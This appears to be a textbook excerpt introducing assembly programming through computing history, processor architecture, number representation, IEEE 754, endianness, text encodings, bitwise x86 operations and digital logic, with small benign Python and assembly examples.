The evolution of computing systems represents one of humanity's most remarkable technological journeys. From mechanical calculating devices to modern quantum computers, this history provides essential context for understanding why assembly language programming remains relevant today.
The Pre-Electronic Era (Pre-1940s)
The earliest computing devices were mechanical. Charles Babbage's Analytical Engine (1837) conceived the fundamental elements of a modern computer: a store (memory), a mill (CPU), and punched cards for input/output. Ada Lovelace wrote an algorithm for this machine and is widely regarded as the first programmer. Herman Hollerith's tabulating machine (1890) used punched cards for the US Census; his company later merged into the firm that became IBM.
First Generation: Vacuum Tubes (1940-1956)
The Electronic Numerical Integrator and Computer (ENIAC), completed in 1945, represented a major leap. With 17,468 vacuum tubes, it could perform 5,000 additions per second, which was revolutionary for its time. However, programming required physically rewiring the machine. The Manchester Baby (1948) became the first electronic stored-program computer, implementing the Von Neumann architecture we still use today. UNIVAC I (1951) became the first commercial computer produced in the United States and famously predicted Eisenhower's 1952 election victory.
Second Generation: Transistors (1956-1963)
The transistor's invention at Bell Labs (1947) transformed computing. Transistors were smaller, more reliable, and generated less heat than vacuum tubes. IBM introduced the 1401 and 7090 mainframes. The first high-level languages emerged—FORTRAN (1957) and COBOL (1959). Assembly language became essential as programmers needed to interface between these new languages and the underlying hardware.
Third Generation: Integrated Circuits (1964-1971)
Jack Kilby and Robert Noyce independently invented the integrated circuit, allowing multiple transistors on a single chip. IBM's System/360 (1964) introduced the concept of a compatible family of computers, all sharing the same instruction set architecture—a principle that would later define x86 compatibility. The PDP-8 (1965) became the first successful minicomputer, priced at an accessible $18,000.
Fourth Generation: Microprocessors (1971-Present)
Intel's 4004 (1971), the first commercial microprocessor, contained 2,300 transistors and ran at 740 kHz. The 8080 (1974) powered the Altair 8800, sparking the personal computer revolution. The 8086 (1978) introduced the x86 architecture that dominates desktop computing to this day. Each subsequent generation (286, 386, 486, Pentium, Core) added features while maintaining backward compatibility.
The Modern Era
Today's processors contain billions of transistors. Apple's M1 (2020) demonstrates the power of system-on-chip design, integrating CPU, GPU, memory, and specialized accelerators. Yet the fundamental concepts remain—instructions execute, data moves, and assembly language provides the closest view of this process.
John Von Neumann's 1945 report "First Draft of a Report on the EDVAC" described an architecture that became the foundation of virtually all general-purpose computers.
Core Components
The Von Neumann architecture consists of four main subsystems:
- Arithmetic Logic Unit (ALU): Performs arithmetic and logic operations (together with the control unit, it forms the CPU)
- Memory Unit: Stores both instructions and data
- Input/Output System: Communicates with external devices
- Control Unit: Coordinates operations
The Stored-Program Concept
The revolutionary insight was storing both program instructions and data in the same memory space. This allowed:
- Self-modifying code (common in early assembly programming)
- Programs to be treated as data (enabling compilers and assemblers)
- Easy loading of new programs into memory
The Fetch-Decode-Execute Cycle
The Von Neumann architecture operates through a continuous cycle:
- Fetch: The CPU retrieves an instruction from memory at the address stored in the Program Counter (PC)
- Decode: The Control Unit interprets the instruction
- Execute: The ALU or other components perform the required operation
- Store: Results are written back to memory or registers
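The cycle above can be sketched as a toy interpreter. This is only a minimal Python illustration, not a model of any real CPU: the four opcodes, the (opcode, operand) tuple encoding, and the single accumulator are assumptions made for the example. Instructions and data share one memory list, in the spirit of the stored-program concept.

```python
# Toy stored-program machine (hypothetical instruction set, for illustration only).
LOAD, ADD, STORE, HALT = "LOAD", "ADD", "STORE", "HALT"

def run(memory):
    """Execute the program held in `memory` and return the final memory."""
    pc = 0    # Program Counter: address of the next instruction
    acc = 0   # single accumulator register
    while True:
        opcode, operand = memory[pc]   # Fetch the instruction at PC
        pc += 1                        # advance PC to the next instruction
        if opcode == LOAD:             # Decode, then Execute
            acc = memory[operand]
        elif opcode == ADD:
            acc += memory[operand]
        elif opcode == STORE:
            memory[operand] = acc      # Store the result back to memory
        elif opcode == HALT:
            return memory
        else:
            raise ValueError(f"unknown opcode {opcode!r}")

program = [
    (LOAD, 4),    # address 0
    (ADD, 5),     # address 1
    (STORE, 6),   # address 2
    (HALT, 0),    # address 3
    40,           # address 4: data
    2,            # address 5: data
    0,            # address 6: result is written here
]
print(run(list(program))[6])   # 42
```

Because code and data live in the same list, a STORE aimed at addresses 0-3 would overwrite an instruction, which is exactly the self-modifying behavior the stored-program design permits.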
The Von Neumann Bottleneck
The shared bus between CPU and memory creates a fundamental limitation—the "Von Neumann bottleneck." Since instructions and data share the same pathway, throughput is limited by bus bandwidth. This constraint has driven many architectural innovations:
- Cache memories (storing frequently used data closer to CPU)
- Harvard architecture (separate instruction and data paths)
- Superscalar execution (fetching multiple instructions simultaneously)
The Harvard Mark I, completed in 1944, used physically separate memory for instructions and data. This design offers distinct advantages:
Characteristics
- Separate address spaces for instructions and data
- Dedicated buses for each memory type
- Simultaneous access to instructions and data
Advantages
- No Von Neumann bottleneck for instruction fetch
- Security benefits (preventing code modification)
- Deterministic timing (critical for embedded systems)
Disadvantages
- More complex hardware
- Wasted memory if spaces are unbalanced
- Cannot load new programs easily
Modern processors typically implement a modified Harvard architecture, which combines features of both designs:
- Separate L1 caches for instructions and data
- Unified memory at higher levels (L2/L3 cache, main memory)
- Special instructions for accessing code as data
This approach gives the performance benefits of Harvard at the cache level while maintaining the flexibility of Von Neumann for main memory. Most ARM Cortex-M processors use modified Harvard, as do x86 processors at the cache level.
The philosophical divide between Complex Instruction Set Computer (CISC) and Reduced Instruction Set Computer (RISC) architecture has shaped processor design for decades.
CISC Characteristics (x86, 68000)
CISC emerged when memory was expensive and compilers were primitive. Key features include:
- Variable instruction length: Instructions can be 1-15 bytes on x86
- Complex instructions: Single instructions perform multi-step operations (e.g., REP MOVSB copies entire strings)
- Memory-operand instructions: Operations can work directly on memory
- Fewer registers: Historical constraints limited register count
- Microcode: Complex instructions are implemented as microcode routines
Advantages of CISC:
- Dense code (important when memory was expensive)
- Backward compatibility (x86 maintains 40+ years of compatibility)
- Simpler compilers (instructions map directly to high-level constructs)
RISC Characteristics (ARM, RISC-V, MIPS)
RISC emerged from research at IBM, Stanford, and UC Berkeley in the late 1970s and 1980s, emphasizing simplicity and regularity:
- Fixed instruction length: Typically 32 bits
- Simple instructions: Each instruction does one thing
- Load-store architecture: Only load/store access memory
- Many registers: Typically 32 general-purpose registers
- Hardwired control: No microcode, faster decoding
Advantages of RISC:
- Simpler pipeline design
- Easier to achieve high clock speeds
- More efficient compiler optimization
- Lower power consumption
The Modern Convergence
Modern x86 processors internally convert CISC instructions into RISC-like micro-ops, then execute them on a RISC-style core. ARM added the Thumb and Thumb-2 instruction sets for denser code. The distinction has blurred, but understanding both remains valuable for assembly programmers.
A modern CPU represents an astonishing feat of engineering, containing billions of transistors operating at gigahertz frequencies. Understanding its components helps assembly programmers write better code.
Core Components
- Arithmetic Logic Unit (ALU): Performs arithmetic and logical operations
  - Integer arithmetic (ADD, SUB, MUL, DIV)
  - Bitwise operations (AND, OR, XOR, NOT)
  - Shift and rotate operations
- Floating Point Unit (FPU): Handles floating-point calculations
  - IEEE 754 compliance
  - SIMD/vector extensions for parallel floating-point
- Control Unit: Coordinates instruction execution
  - Instruction fetch and decode
  - Branch prediction
  - Exception handling
- Cache Hierarchy: Multi-level memory caching
  - L1: Fastest, smallest (32KB typical), split instruction/data
  - L2: Larger (256KB-1MB), unified
  - L3: Shared among cores (several MB)
  - L4: Optional, eDRAM or similar
- Memory Management Unit (MMU): Handles virtual-to-physical address translation
  - Page table walking
  - TLB (Translation Lookaside Buffer) caching
- Register File: Fastest storage, directly accessible
  - General-purpose registers
  - Control/status registers
  - Vector registers (for SIMD)
Superscalar Components
Modern processors can execute multiple instructions per cycle:
- Multiple execution units: Several ALUs, FPUs, load/store units
- Out-of-order execution: Reorder instructions for better throughput
- Register renaming: Eliminate false dependencies
- Speculative execution: Execute branches before they're resolved
With high-level languages dominating modern development, one might question assembly's relevance. However, assembly language programming remains crucial for several domains:
Performance-Critical Code
- Game engines: Graphics routines, physics calculations
- Encryption/decryption: AES, SHA implementations
- Signal processing: Audio/video codecs, DSP algorithms
- HPC applications: Mathematical libraries (BLAS, LAPACK)
System Programming
- Operating systems: Context switching, interrupt handlers, memory management
- Device drivers: Direct hardware interaction, MMIO
- Bootloaders: Initial system startup before C runtime available
- Hypervisors/VMMs: Virtual machine management
Reverse Engineering and Security
- Malware analysis: Understanding malicious code behavior
- Vulnerability research: Finding and exploiting bugs
- Binary patching: Modifying compiled programs
- Digital rights management: Bypassing protection mechanisms
Embedded Systems
- Microcontrollers: Small devices with limited resources
- Firmware: BIOS/UEFI, router firmware, IoT devices
- Real-time systems: Guaranteed timing constraints
Compiler Development
- Code generation: Understanding target architecture
- Optimization: Recognizing pattern opportunities
- Debugging: Analyzing compiler output
Education and Understanding
- Computer architecture: Deep understanding of how computers work
- Debugging skills: Reading disassembled code when debugging
- Security awareness: Understanding exploitation techniques
When Assembly Is Appropriate
- When performance is absolutely critical
- When hardware access is required
- When no compiler exists for the target
- When reverse engineering existing code
- When size constraints are extreme (boot sectors)
When Assembly Is Not Appropriate
- Most application development
- When portability matters
- When development speed is priority
- When maintenance cost must be minimized
Understanding number systems is fundamental to assembly programming, as computers ultimately work with binary representations.
Binary (Base-2)
Computers use binary because transistors have two stable states: on (1) and off (0). Each binary digit (bit) represents a power of 2:
Binary: 10110110
Value: 1×2⁷ + 0×2⁶ + 1×2⁵ + 1×2⁴ + 0×2³ + 1×2² + 1×2¹ + 0×2⁰
= 128 + 0 + 32 + 16 + 0 + 4 + 2 + 0
= 182 decimal
Common bit groupings:
- Nibble: 4 bits (one hex digit)
- Byte: 8 bits (fundamental addressable unit)
- Word: 16 bits (historical x86 word size)
- DWORD: 32 bits (double word)
- QWORD: 64 bits (quad word)
Octal (Base-8)
Octal was popular in early computing (PDP-8, UNIX permissions) because 3 bits group neatly:
Octal: 266
Binary: 010 110 110 (3 bits per digit)
Value: 2×8² + 6×8¹ + 6×8⁰ = 128 + 48 + 6 = 182 decimal
Decimal (Base-10)
Human-familiar system but problematic for computers because:
- 10 is not a power of 2
- Some decimal fractions have infinite (repeating) binary representations (e.g., 0.1)
- Binary-coded decimal (BCD) was developed to address this
Hexadecimal (Base-16)
The most common system in assembly programming because 4 bits fit perfectly:
Hex: B6
Binary: 1011 0110
Value: B×16¹ + 6×16⁰ = 11×16 + 6 = 176 + 6 = 182 decimal
Conversion Between Bases
Converting between binary and hex is straightforward due to the 4-bit grouping:
Binary: 1011 0110 1111 0001
Digit:  B    6    F    1
Hex:    B6F1
Converting decimal to binary involves repeated division:
182 ÷ 2 = 91 remainder 0 (LSB)
91 ÷ 2 = 45 remainder 1
45 ÷ 2 = 22 remainder 1
22 ÷ 2 = 11 remainder 0
11 ÷ 2 = 5 remainder 1
5 ÷ 2 = 2 remainder 1
2 ÷ 2 = 1 remainder 0
1 ÷ 2 = 0 remainder 1 (MSB)
Read remainders from bottom up: 10110110
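The repeated-division procedure generalizes to any base. The following Python sketch is one way to write it; the function name `to_base` and its range limits are choices made for this example.

```python
def to_base(value, base):
    """Convert a non-negative integer to a digit string by repeated division."""
    if value < 0 or not 2 <= base <= 16:
        raise ValueError("expects value >= 0 and 2 <= base <= 16")
    digits = "0123456789ABCDEF"
    if value == 0:
        return "0"
    out = []
    while value > 0:
        value, remainder = divmod(value, base)
        out.append(digits[remainder])    # least significant digit comes first
    return "".join(reversed(out))        # read the remainders bottom-up

print(to_base(182, 2))    # 10110110
print(to_base(182, 8))    # 266
print(to_base(182, 16))   # B6
```

Python's built-in `int(text, base)` performs the reverse conversion, which makes it easy to cross-check results such as `int("B6F1", 16) == int("1011011011110001", 2)`.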
The same binary pattern can represent different values depending on interpretation.
Unsigned Integers
All bits contribute to magnitude. Range for n bits: 0 to 2ⁿ-1
8-bit unsigned: 00000000 to 11111111 (0 to 255)
16-bit unsigned: 0 to 65535
32-bit unsigned: 0 to 4,294,967,295
64-bit unsigned: 0 to 18,446,744,073,709,551,615
Signed Magnitude
The simplest signed representation (rarely used):
- MSB represents sign (0=positive, 1=negative)
- Remaining bits represent magnitude
- Problem: Two representations for zero (+0 and -0)
+42: 00101010
-42: 10101010
One's Complement
Negatives are bitwise NOT of positives:
- Still has two zeros (+0=00000000, -0=11111111)
- Arithmetic requires end-around carry
- Used in some early computers (CDC 6600)
+42: 00101010
-42: 11010101
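Both legacy encodings are easy to reproduce. This Python sketch (helper names are hypothetical) builds the 8-bit patterns for sign-magnitude and one's complement so the ±42 examples can be checked.

```python
def sign_magnitude(value, bits=8):
    """MSB holds the sign; the remaining bits hold the magnitude."""
    limit = (1 << (bits - 1)) - 1
    if abs(value) > limit:
        raise ValueError("magnitude out of range")
    sign = 1 if value < 0 else 0
    return format((sign << (bits - 1)) | abs(value), f"0{bits}b")

def ones_complement(value, bits=8):
    """Negative values are the bitwise NOT of the positive pattern."""
    limit = (1 << (bits - 1)) - 1
    if abs(value) > limit:
        raise ValueError("magnitude out of range")
    mask = (1 << bits) - 1
    pattern = abs(value) if value >= 0 else ~abs(value) & mask
    return format(pattern, f"0{bits}b")

print(sign_magnitude(42), sign_magnitude(-42))     # 00101010 10101010
print(ones_complement(42), ones_complement(-42))   # 00101010 11010101
```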
Two's complement is the universal signed integer representation in modern computers. Negatives are formed by inverting all bits and adding 1.
Formation Rule:
-N = ~N + 1
Examples with 8 bits:
+42: 00101010
-42: 11010110 (invert: 11010101, add 1: 11010110)
+127: 01111111
-128: 10000000 (no positive counterpart: +128 does not fit in 8 signed bits, and inverting 10000000 to 01111111 then adding 1 gives 10000000 again)
Advantages of Two's Complement:
- Single representation for zero
- Addition/subtraction same for signed/unsigned
- Automatic modulo arithmetic
- Nearly symmetric range (one extra negative value)
Range: -2ⁿ⁻¹ to 2ⁿ⁻¹-1
- 8-bit: -128 to 127
- 16-bit: -32,768 to 32,767
- 32-bit: -2,147,483,648 to 2,147,483,647
Sign Extension
Extending a signed number to more bits preserves value:
8-bit -42: 11010110
16-bit -42: 11111111 11010110 (copy sign bit to new high bits)
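Two's complement encoding, decoding, and sign extension can be sketched in Python, whose integers are unbounded, so the fixed width has to be imposed with a mask. The function names are assumptions for this example.

```python
def to_twos_complement(value, bits):
    """Return the unsigned bit pattern that encodes `value` in `bits` bits."""
    lo, hi = -(1 << (bits - 1)), (1 << (bits - 1)) - 1
    if not lo <= value <= hi:
        raise ValueError(f"{value} does not fit in {bits} bits")
    return value & ((1 << bits) - 1)

def from_twos_complement(pattern, bits):
    """Interpret an unsigned bit pattern as a signed two's complement value."""
    sign_bit = 1 << (bits - 1)
    return (pattern ^ sign_bit) - sign_bit

def sign_extend(pattern, from_bits, to_bits):
    """Widen a pattern by copying its sign bit into the new high bits."""
    return to_twos_complement(from_twos_complement(pattern, from_bits), to_bits)

print(format(to_twos_complement(-42, 8), "08b"))    # 11010110
print(from_twos_complement(0b10000000, 8))          # -128
print(format(sign_extend(0b11010110, 8, 16), "016b"))  # 1111111111010110
```

The formation rule `-N = ~N + 1` can be checked the same way: `(~42 + 1) & 0xFF` yields the pattern `0xD6`.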
Real numbers require floating-point representation. IEEE 754 is the universal standard.
Scientific Notation Review
Decimal scientific notation: 1.234 × 10³ = 1234
Binary scientific notation: 1.011 × 2³ = 1011₂ = 11₁₀
IEEE 754 Single Precision (32-bit)
Bits: SEEEEEEE EMMMMMMM MMMMMMMM MMMMMMMM
Where:
S = Sign bit (1 bit)
E = Exponent (8 bits)
M = Mantissa/Significand (23 bits)
Components:
- Sign bit: 0 for positive, 1 for negative
- Biased exponent: Actual exponent + 127 bias
- Normalized mantissa: Leading 1 is implicit (except special cases)
Value Formula:
(-1)ˢ × 1.M × 2⁽ᴱ⁻¹²⁷⁾
Special Values:
- Zero: E=0, M=0 (±0 exists)
- Denormalized: E=0, M≠0 (gradual underflow)
- Infinity: E=255, M=0 (±∞)
- NaN: E=255, M≠0 (Not a Number)
Example: Representing 42.0
- Convert to binary: 42 = 32 + 8 + 2 = 101010₂
- Normalize: 101010 = 1.01010 × 2⁵
- Bias exponent: 5 + 127 = 132 = 10000100₂
- Mantissa: 01010 (implicit leading 1)
- Sign: 0 (positive)
Result: 0 10000100 01010000000000000000000
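The worked example can be checked by letting Python's standard `struct` module produce the single-precision encoding and then slicing out the three fields. The helper name `float32_fields` is an assumption for this sketch.

```python
import struct

def float32_fields(x):
    """Return (sign, biased exponent, mantissa) of x as an IEEE 754 single."""
    (raw,) = struct.unpack(">I", struct.pack(">f", x))  # reinterpret the 4 bytes as an integer
    sign = raw >> 31
    exponent = (raw >> 23) & 0xFF
    mantissa = raw & 0x7FFFFF
    return sign, exponent, mantissa

sign, exponent, mantissa = float32_fields(42.0)
print(sign, format(exponent, "08b"), format(mantissa, "023b"))
# 0 10000100 01010000000000000000000
```

The same function shows the special values: infinity decodes to exponent 255 with a zero mantissa, and negative zero to sign 1 with everything else zero.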
Double Precision (64-bit)
- Sign: 1 bit
- Exponent: 11 bits (bias 1023)
- Mantissa: 52 bits
- Range: approximately ±2.2×10⁻³⁰⁸ to ±1.8×10³⁰⁸ (normalized values)
Precision Limitations
Floating-point numbers are approximations:
- 0.1 in binary is repeating: 0.0001100110011...
- Some operations lose precision
- Equality comparison usually requires a tolerance (epsilon)
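A short Python illustration of these limitations, using double precision (Python's `float`). The tolerance shown is simply the default of `math.isclose`; an appropriate tolerance depends on the application.

```python
import math
from fractions import Fraction

total = 0.1 + 0.2
print(total == 0.3)                       # False: exact comparison fails
print(math.isclose(total, 0.3))           # True: comparison within a relative tolerance
print(Fraction(0.1) == Fraction(1, 10))   # False: the stored value is not exactly 1/10
```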
Endianness describes byte ordering in multi-byte values.
Big-Endian
Most significant byte stored at lowest address (network byte order):
Memory address:   [0]  [1]  [2]  [3]
Value 0x12345678: 0x12 0x34 0x56 0x78
Used by: network protocols, PowerPC, SPARC, 68000
Little-Endian
Least significant byte stored at lowest address:
Memory address:   [0]  [1]  [2]  [3]
Value 0x12345678: 0x78 0x56 0x34 0x12
Used by: x86, x86-64, most ARM systems
Bi-Endian
Some architectures (ARM, MIPS) can switch endianness.
Implications for Assembly Programmers
- Multi-byte values read/written differently
- Network data requires byte swapping
- Type punning through unions/pointers affected
- Debugger memory dumps show reversed bytes on little-endian
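The two byte orders can be compared directly in Python, where `int.to_bytes` takes the byte order as an argument. The `bswap32` helper is a hypothetical name that mimics a 32-bit byte swap.

```python
value = 0x12345678

big = value.to_bytes(4, "big")        # most significant byte first
little = value.to_bytes(4, "little")  # least significant byte first
print(big.hex(" "))      # 12 34 56 78
print(little.hex(" "))   # 78 56 34 12

def bswap32(x):
    """Reverse the byte order of a 32-bit value."""
    return int.from_bytes(x.to_bytes(4, "little"), "big")

print(hex(bswap32(value)))   # 0x78563412
```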
Example in x86 Assembly:
; Storing 0x12345678 to memory
mov eax, 0x12345678
mov [mem], eax
; Memory now contains: 78 56 34 12
; To read as network order, need:
bswap eax ; byte swap instruction
ASCII (American Standard Code for Information Interchange)
7-bit encoding (0-127) covering English letters, digits, punctuation, and control characters:
0x41: 'A'
0x61: 'a'
0x30: '0'
0x20: Space
0x0D: Carriage Return
0x0A: Line Feed
Extended ASCII (8-bit) added characters 128-255, but varies by code page.
Unicode
Universal character set supporting all world scripts. Several encoding forms:
UTF-8
- Variable-length: 1-4 bytes per character
- ASCII characters use 1 byte (compatible with ASCII)
- Self-synchronizing (can find character boundaries)
- Dominant on web (over 95% of pages)
Encoding pattern:
0xxxxxxx (ASCII, 0-127)
110xxxxx 10xxxxxx (2 bytes, 128-2047)
1110xxxx 10xxxxxx 10xxxxxx (3 bytes, 2048-65535)
11110xxx 10xxxxxx 10xxxxxx 10xxxxxx (4 bytes, 65536+)
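The bit patterns above translate into a small encoder. This Python sketch (the function name is an assumption) builds the bytes by hand so they can be compared with the language's own UTF-8 codec.

```python
def utf8_encode(code_point):
    """Encode one Unicode code point as UTF-8 bytes using the patterns above."""
    if not 0 <= code_point <= 0x10FFFF or 0xD800 <= code_point <= 0xDFFF:
        raise ValueError("not a valid Unicode scalar value")
    if code_point < 0x80:                       # 0xxxxxxx
        return bytes([code_point])
    if code_point < 0x800:                      # 110xxxxx 10xxxxxx
        return bytes([0xC0 | (code_point >> 6),
                      0x80 | (code_point & 0x3F)])
    if code_point < 0x10000:                    # 1110xxxx 10xxxxxx 10xxxxxx
        return bytes([0xE0 | (code_point >> 12),
                      0x80 | ((code_point >> 6) & 0x3F),
                      0x80 | (code_point & 0x3F)])
    return bytes([0xF0 | (code_point >> 18),    # 11110xxx 10xxxxxx 10xxxxxx 10xxxxxx
                  0x80 | ((code_point >> 12) & 0x3F),
                  0x80 | ((code_point >> 6) & 0x3F),
                  0x80 | (code_point & 0x3F)])

for ch in "A\u00e9\u20ac\U0001F600":
    print(f"U+{ord(ch):04X}", utf8_encode(ord(ch)).hex(" "))
```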
UTF-16
- Variable-length: 2 or 4 bytes
- Most common characters use 2 bytes
- Used internally by Windows, Java, .NET
- Surrogate pairs for characters beyond 65535
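Surrogate pairs follow a fixed arithmetic rule: subtract 0x10000, then split the remaining 20 bits into two 10-bit halves. A minimal Python sketch, with a hypothetical function name:

```python
def utf16_units(code_point):
    """Return the list of 16-bit code units that encode one code point."""
    if not 0 <= code_point <= 0x10FFFF or 0xD800 <= code_point <= 0xDFFF:
        raise ValueError("not a valid Unicode scalar value")
    if code_point < 0x10000:
        return [code_point]                 # fits in a single 16-bit unit
    offset = code_point - 0x10000           # 20 bits remain
    high = 0xD800 | (offset >> 10)          # high surrogate: top 10 bits
    low = 0xDC00 | (offset & 0x3FF)         # low surrogate: bottom 10 bits
    return [high, low]

print([hex(u) for u in utf16_units(0x1F600)])   # ['0xd83d', '0xde00']
```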
UTF-32
- Fixed 4-byte characters
- Simple but inefficient
- Rarely used except internally
Bitwise operations are fundamental to assembly programming.
AND (&)
Truth table: 1&1=1, 1&0=0, 0&1=0, 0&0=0
Use: Masking bits, clearing bits
and eax, 0x0F ; keep only low 4 bits
and eax, ebx ; bitwise AND
OR (|)
Truth table: 1|1=1, 1|0=1, 0|1=1, 0|0=0
Use: Setting bits
or eax, 0x80 ; set bit 7
or eax, ebx ; bitwise OR
XOR (^)
Truth table: 1^1=0, 1^0=1, 0^1=1, 0^0=0
Use: Toggling bits, clearing registers
xor eax, eax ; zero register (shorter encoding than mov eax, 0)
xor eax, 0xFF ; toggle low 8 bits
NOT (~)
Truth table: ~1=0, ~0=1
Use: Bitwise complement
not eax ; invert all bits
Common Bit Manipulations
Test if bit n is set:
test eax, 1<<n ; AND without storing result
jnz bit_set
Set bit n:
or eax, 1<<n
Clear bit n:
and eax, ~(1<<n)
Toggle bit n:
xor eax, 1<<n
Extract bit field:
; Extract bits 8-15 into low byte
mov ebx, eax
shr ebx, 8
and ebx, 0xFF
Combine bit fields:
; Replace bits 8-15 of eax with bits 8-15 of ebx
and eax, 0xFFFF00FF ; clear bits 8-15 of eax
and ebx, 0x0000FF00 ; isolate bits 8-15 of ebx
or eax, ebx ; combine
Bitwise Tricks
Swap without temporary:
xor eax, ebx
xor ebx, eax
xor eax, ebx
Check power of two:
lea ebx, [eax-1] ; ebx = eax - 1 (clobbers ebx)
test eax, ebx ; eax AND (eax - 1), result discarded
jz power_of_two ; ZF set if eax is a power of two (also when eax = 0, so test for zero separately)
Count set bits (population count):
; Modern x86 has POPCNT instruction
popcnt eax, eax
Logic gates are the building blocks of digital circuits. Understanding them helps assembly programmers appreciate what's happening at the lowest level.
Basic Gates
AND Gate
- Output HIGH only when ALL inputs HIGH
- Symbol: D-shaped symbol
- Truth table (2-input):
A B | Q
0 0 | 0
0 1 | 0
1 0 | 0
1 1 | 1
OR Gate
- Output HIGH when ANY input HIGH
- Symbol: Curved input, pointed output
- Truth table:
A B | Q
0 0 | 0
0 1 | 1
1 0 | 1
1 1 | 1
NOT Gate (Inverter)
- Output opposite of input
- Symbol: Triangle with bubble
- Truth table:
A | Q
0 | 1
1 | 0
NAND Gate
- AND followed by NOT
- Universal gate (can build any circuit)
- Symbol: AND with bubble
NOR Gate
- OR followed by NOT
- Also universal
XOR Gate
- Output HIGH when inputs differ
- Symbol: OR with additional line
- Truth table:
A B | Q
0 0 | 0
0 1 | 1
1 0 | 1
1 1 | 0
XNOR Gate
- Output HIGH when inputs same
- XOR followed by NOT
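The claim that NAND is universal can be illustrated by building the other gates from it. In this Python sketch, signals are the integers 0 and 1 and every gate is expressed only through `nand`; the trailing underscores merely avoid Python keywords.

```python
def nand(a, b):
    return 1 - (a & b)

def not_(a):
    return nand(a, a)

def and_(a, b):
    return not_(nand(a, b))

def or_(a, b):
    return nand(not_(a), not_(b))      # De Morgan: A + B = (A' . B')'

def xor_(a, b):
    n = nand(a, b)
    return nand(nand(a, n), nand(b, n))  # classic four-NAND XOR

def xnor_(a, b):
    return not_(xor_(a, b))

for a in (0, 1):
    for b in (0, 1):
        print(a, b, "|", and_(a, b), or_(a, b), xor_(a, b), xnor_(a, b))
```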
Gate Delay
Real gates have propagation delay (typically picoseconds to nanoseconds), which affects maximum clock speed and can cause race conditions.
Boolean algebra provides mathematical tools for analyzing and simplifying digital circuits.
Laws and Identities
Identity and Null Laws:
- A + 0 = A
- A · 1 = A
- A + 1 = 1
- A · 0 = 0
Idempotent Laws:
- A + A = A
- A · A = A
Complement Laws:
- A + A' = 1
- A · A' = 0
Involution Law:
- (A')' = A
Commutative Laws:
- A + B = B + A
- A · B = B · A
Associative Laws:
- (A + B) + C = A + (B + C)
- (A · B) · C = A · (B · C)
Distributive Laws:
- A · (B + C) = A·B + A·C
- A + (B·C) = (A+B) · (A+C)
DeMorgan's Theorems:
- (A + B)' = A' · B'
- (A · B)' = A' + B'
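Since each variable takes only two values, any of these laws can be verified by brute force over all input combinations. A small Python sketch; the `holds` helper and the selection of laws are choices made for this example.

```python
from itertools import product

def holds(law, variables):
    """True if `law` evaluates to True for every combination of inputs."""
    return all(law(*values) for values in product((False, True), repeat=variables))

laws = {
    "De Morgan (OR)":  (lambda a, b: (not (a or b)) == ((not a) and (not b)), 2),
    "De Morgan (AND)": (lambda a, b: (not (a and b)) == ((not a) or (not b)), 2),
    "Distributive (AND over OR)": (lambda a, b, c: (a and (b or c)) == ((a and b) or (a and c)), 3),
    "Distributive (OR over AND)": (lambda a, b, c: (a or (b and c)) == ((a or b) and (a or c)), 3),
    "Involution": (lambda a: (not (not a)) == a, 1),
}

for name, (law, count) in laws.items():
    print(f"{name}: {holds(law, count)}")
```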
Karnaugh Maps
Graphical method for simplifying Boolean expressions with up to 6 variables:
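2-variable K-map:
       B
     0   1
A 0 |   |   |
  1 |   |   |
Example: Simplify A'B + AB'
- The two 1s fall in cells (A=0, B=1) and (A=1, B=0), which are diagonal rather than adjacent, so no grouping is possible; the expression is already minimal and equals A XOR B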
Flip-flops are sequential logic elements that store state.
SR Latch (Set-Reset)
Basic bistable element:
- S=1, R=0: Set Q=1
- S=0, R=1: Reset Q=0
- S=0, R=0: Hold state
- S=1, R=1: Invalid (race condition)
D Flip-Flop
Data flip-flop captures input on clock edge:
Truth table (positive edge-triggered):
Clock D Q(next)
↑ 0 0
↑ 1 1
otherwise Q unchanged
JK Flip-Flop
More versatile, eliminates invalid state:
- J=1, K=0: Set
- J=0, K=1: Reset
- J=1, K=1: Toggle
- J=0, K=0: Hold
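The behavior of these elements can be modeled in a few lines of Python. This is a behavioral sketch only (no propagation delay or setup/hold timing), and the class and function names are assumptions for the example.

```python
class DFlipFlop:
    """Positive edge-triggered D flip-flop."""
    def __init__(self):
        self.q = 0
        self._last_clock = 0

    def tick(self, clock, d):
        if clock == 1 and self._last_clock == 0:   # rising edge: capture D
            self.q = d
        self._last_clock = clock                   # otherwise Q is unchanged
        return self.q

def jk_next(q, j, k):
    """Next state of a JK flip-flop on its active clock edge."""
    return (j & (1 - q)) | ((1 - k) & q)

ff = DFlipFlop()
print([ff.tick(c, d) for c, d in [(0, 1), (1, 1), (1, 0), (0, 0), (1, 0)]])
# [0, 1, 1, 1, 0]
print(jk_next(0, 1, 1), jk_next(1, 1, 1))   # 1 0  (toggle)
```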
Registers
Multiple D flip-flops sharing common clock form a register:
8-bit register:
D0 D1 D2 D3 D4 D5 D6 D7
| | | | | | | |
Clock---|--|--|--|--|--|--|--|--
Q0 Q1 Q2 Q3 Q4 Q5 Q6 Q7
Register Transfer Level (RTL)
Registers connected by combinational logic form the basis of CPU design. Assembly instructions correspond to RTL operations:
mov eax, ebx ; RTL: EAX ← EBX
add eax, ecx ; RTL: EAX ← EAX + ECX
Half Adder
Adds two bits, produces sum and carry:
Sum = A XOR B
Carry = A AND B
Truth table:
A B | Sum Carry
0 0 | 0 0
0 1 | 1 0
1 0 | 1 0
1 1 | 0 1
Full Adder
Adds three bits (two inputs plus carry-in):
Sum = (A XOR B) XOR Cin
Cout = (A AND B) OR (Cin AND (A XOR B))
Truth table:
A B Cin | Sum Cout
0 0 0 | 0 0
0 0 1 | 1 0
0 1 0 | 1 0
0 1 1 | 0 1
1 0 0 | 1 0
1 0 1 | 0 1
1 1 0 | 0 1
1 1 1 | 1 1
Ripple-Carry Adder
Chain full adders for multi-bit addition:
      A3 B3   A2 B2   A1 B1   A0 B0
      |  |    |  |    |  |    |  |
Cout--FA3-----FA2-----FA1-----FA0--Cin
       |       |       |       |
       S3      S2      S1      S0
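The chain can be simulated bit by bit. This Python sketch uses the full-adder equations given earlier (Sum = A XOR B XOR Cin, Cout = AB + Cin(A XOR B)) and passes each stage's carry to the next; function names and the 4-bit default are assumptions.

```python
def full_adder(a, b, cin):
    """One-bit full adder: returns (sum, carry_out)."""
    s = (a ^ b) ^ cin
    cout = (a & b) | (cin & (a ^ b))
    return s, cout

def ripple_carry_add(a, b, bits=4, cin=0):
    """Add two unsigned values one bit at a time, rippling the carry upward."""
    result = 0
    carry = cin
    for i in range(bits):                      # bit 0 (FA0) first
        s, carry = full_adder((a >> i) & 1, (b >> i) & 1, carry)
        result |= s << i
    return result, carry                       # carry is the final Cout

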